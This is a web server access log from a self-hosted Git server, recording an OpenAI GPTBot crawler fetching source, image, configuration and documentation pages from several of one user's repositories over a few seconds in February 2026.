"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" +[17/Feb/2026:15:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10833] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" +[17/Feb/2026:15:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:15:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=source" [Client 74.7.227.38] [Length 11728] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" +[17/Feb/2026:15:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" +[17/Feb/2026:15:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" +[17/Feb/2026:15:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:15:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" +[17/Feb/2026:15:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13887] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" +[17/Feb/2026:15:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:15:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14823] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" +[17/Feb/2026:15:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:15:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15556] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" +[17/Feb/2026:15:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14210] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" +[17/Feb/2026:15:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13938] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" +[17/Feb/2026:15:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" +[17/Feb/2026:15:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" +[17/Feb/2026:15:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16482] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" +[17/Feb/2026:15:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:15:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14932] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:15:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" +[17/Feb/2026:15:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate.fish" [Client 74.7.227.38] [Length 26590] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9833] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:15:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11318] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:15:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15946] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:15:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12678] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fMakefile2" [Client 74.7.227.38] [Length 28507] [Gzip 5.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15774] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11341] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10314] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2fsettings.json" [Client 74.7.227.38] [Length 21862] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:15:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20876] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 